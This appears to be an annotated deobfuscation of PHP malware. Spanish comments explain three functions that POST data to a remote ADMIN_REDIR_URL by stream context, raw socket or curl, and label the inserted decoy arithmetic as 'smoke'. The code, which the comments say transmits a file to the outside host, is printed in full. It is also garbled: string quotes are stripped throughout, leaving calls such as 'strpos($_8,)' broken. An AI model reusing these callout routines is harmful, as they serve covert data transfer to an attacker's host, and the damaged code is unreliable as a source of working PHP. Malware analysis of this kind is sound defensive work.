// Caso de que el acceso remoto a ficheros este habilitado
function l__1($_5) {
$_14=stream_context_create(array(http=> array(method=> POST,header=> Content-Type: application/x-www-form-urlencoded . ,content=> $_5,),));
// round(1742) - round(1742) + round(2020) - round(2020) == 0 ; de nuevo la misma historia
// parece que esta linea solo sirve para confundir
(round(0+580.66666666667+580.66666666667+580.66666666667)-round(0+348.4+348.4+348.4+348.4+348.4)+round(0+673.33333333333+673.33333333333+673.33333333333)-round(0+404+404+404+404+404))?array_diff_uassoc($_4,$_7,$_2):mt_rand(round(0+435.5+435.5+435.5+435.5),round(0+4680));
// transmite el fichero
return file_get_contents(ADMIN_REDIR_URL,false,$_14);
// las siguientes instrucciones tambien parece que estan para confundir.
// Lo primero, no podemos llegar a este punto ya que return acaba de
// ser llamado en la instruccion anterior y lo segundo el IF siempre es
// verdadero, por lo que no hace nada y por sonsiguiente el ELSE nunca
// tomado
if ((round(0+80.5+80.5)+round(0+2458)) > round(0+40.25+40.25+40.25+40.25) || strtr($_15,$_16));
else{
curl_close($_1);
}
}
// Usando sockets
// $_11 - identifcador (handler) del socket
// $_17 - Host
// $_15 - Path
// $_5 - Contenido que le mandamos
function l__2($_11,$_17,$_15,$_5) {
fputs($_11,POST .$_15 . HTTP/1.0
."Host: $_17\r\n"
.User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
.Accept: */*
.Accept-Language: en-us,en;q=0.5
.Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
.Content-Length: .strlen($_5) .
."Content-Type: application/x-www-form-urlencoded\r\n\r\n
$_5");
$_8='';
// De nuevo mas humo. El while se convierte en un while(0)
// next please!
while(round(0+3843)-round(0+960.75+960.75+960.75+960.75))
substr_count($_14);
// leemos del socket y almacenamos el contenido en $_8
while($_16=fread($_11,round(0+819.2+819.2+819.2+819.2+819.2))) {
$_8 .= $_16;
// mas humo
if(round(0+2115.3333333333+2115.3333333333+2115.3333333333)<mt_rand(round(0+365+365+365+365+365),round(0+1129+1129+1129+1129)))
strnatcmp($_11);
}
// cerramos el socket
fclose($_11);
$_18=strpos($_8,);
$_8=substr($_8,$_18+round(0+1+1+1+1));
return $_8;
// de nuevo mas humo. De hecho nunca llegaremos aqui, porque
// acabamos de ejecutar el return
while(round(0+2376+2376)-round(0+950.4+950.4+950.4+950.4+950.4))
sha1($_1,$_13,$_8);
}
function l__3($_5) {
$_19=curl_init(ADMIN_REDIR_URL);
// Para sacar los valores
// $arr = get_defined_constants(true);
// var_dump($arr['curl']);
// HEADER
curl_setopt($_19,42,FALSE);
// basura
$_20='vsqw';
// RETURNTRANSFER
curl_setopt($_19,19913,TRUE);
// TIMEOUT == 15
curl_setopt($_19,13,round(0+3.75+3.75+3.75+3.75));
// humo
if((round(0+333.2+333.2+333.2+333.2+333.2)+round(0+875.8+875.8+875.8+875.8+875.8))>round(0+833+833)|| sha1($_21,$_17,$_1,$_13,$_14));
else{
mssql_result($_19);
}
// POSTFIELDS
curl_setopt($_19,10015,$_5);
// humo
(round(0+302.25+302.25+302.25+302.25)-round(0+1209)+round(0+896.5+896.5+896.5+896.5)-round(0+1793+1793))?strtotime($_4,$_10):mt_rand(round(0+1209),round(0+4765));
$_21=curl_exec($_19);
curl_close($_19);
// mas basura
$_22=jqxe;
return $_21;
}